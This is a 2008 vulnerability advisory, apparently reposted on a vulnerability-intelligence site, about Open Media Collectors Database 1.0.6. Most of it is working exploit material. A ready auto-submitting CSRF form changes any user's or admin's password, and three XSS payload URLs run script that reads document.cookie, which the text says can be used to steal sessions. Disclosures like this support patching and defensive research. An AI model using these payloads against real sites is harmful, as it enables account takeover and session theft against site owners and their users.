CSRF and XSS vulnerabilities allow password changes and cookie theft in Open Media Collectors Database.
`#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: Open Media Collectors Database 1.0.6 (15/05/2007)
Product WebSite: http://opendb.iamvegan.net/
#========================================================================#
#============================[CSRF]======================================#
We can change any user or admin password by CSRF, only knowing the user's
username.
POC:
<form name="CSRF" method="POST" action="http://www.victim.com/dir_to_opmcd/user_admin.php">
<input type="hidden" name="user_id" value="USERNAME">
<input type="password" name="pwd" value="NEW_PASSWORD">
<input type="password" name="confirmpwd" value="NEW_PASSWORD">
<input type="hidden" name="redirect_link" value="">
<input type="hidden" name="redirect_url" value="">
<input type="hidden" name="op" value="update_password">
</form>
<script>CSRF.submit()</script>
#========================================================================#
#=============================[XSS]======================================#
With some JavaScript knowledge, we are able to execute JS codes to steal
cookies to use the sessions, or another changes/actions.
POC:
/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>
/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>
*/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)
(*) This vector modifies the "Back to Statistics" (that we also can change),
and when the user clicks on the link, the javascript code is executed
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <[email protected]>
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo